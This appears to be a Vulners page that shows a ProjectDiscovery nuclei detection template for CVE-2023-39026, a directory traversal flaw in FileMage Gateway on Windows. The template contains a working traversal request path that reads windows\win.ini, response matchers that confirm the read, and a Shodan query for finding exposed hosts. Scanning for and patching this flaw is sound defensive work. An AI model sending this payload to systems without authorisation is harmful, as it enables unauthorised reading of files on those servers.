Lucene search
K

FileMage Gateway - Directory Traversal

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

FileMage Gateway - Directory Traversal vulnerability allows remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
FileMage Gateway 1.10.9 - Local File Inclusion Exploit
4 Sep 202300:00
zdt
ATTACKERKB
CVE-2023-39026
22 Aug 202322:15
attackerkb
Circl
CVE-2023-39026
23 Aug 202302:12
circl
CNNVD
FileMage 路径遍历漏洞
22 Aug 202300:00
cnnvd
CVE
CVE-2023-39026
22 Aug 202300:00
cve
Cvelist
CVE-2023-39026
22 Aug 202300:00
cvelist
Exploit DB
FileMage Gateway 1.10.9 - Local File Inclusion
4 Sep 202300:00
exploitdb
NVD
CVE-2023-39026
22 Aug 202322:15
nvd
OSV
CVE-2023-39026
22 Aug 202322:15
osv
Packet Storm
FileMage Gateway 1.10.9 Local File Inclusion
5 Sep 202300:00
packetstorm
Rows per page
id: CVE-2023-39026

info:
  name: FileMage Gateway - Directory Traversal
  author: DhiyaneshDk
  severity: high
  description: |
    Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
  impact: |
    An attacker can view, modify, or delete sensitive files on the system, potentially leading to unauthorized access, data leakage, or system compromise.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FileMage Gateway.
  reference:
    - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
    - https://securityonline.info/cve-2023-39026-filemage-gateway-directory-traversal-vulnerability/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39026
    - https://www.filemage.io/docs/updates.html#change-log
    - http://packetstormsecurity.com/files/174491/FileMage-Gateway-1.10.9-Local-File-Inclusion.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-39026
    cwe-id: CWE-22
    epss-score: 0.10562
    epss-percentile: 0.95233
    cpe: cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: microsoft
    product: windows
    shodan-query:
      - title:"FileMage"
      - cpe:"cpe:2.3:o:microsoft:windows"
  tags: cve2023,cve,packetstorm,lfi,filemage,microsoft,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body,'bit app support','extensions','fonts')"
          - "contains(content_type, 'text/plain')"
          - "status_code == 200"
        condition: and
# digest: 490a0046304402202eb3a9159eb3005ba668f3f9e37db7db96d8dd3a4ec5f40a04840b3b191c5f860220210ecf9b5c10c970d2b69e1f4598ca7b10c88e773e399383168c61d792c2ab48:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.5
EPSS0.10562
SSVC
33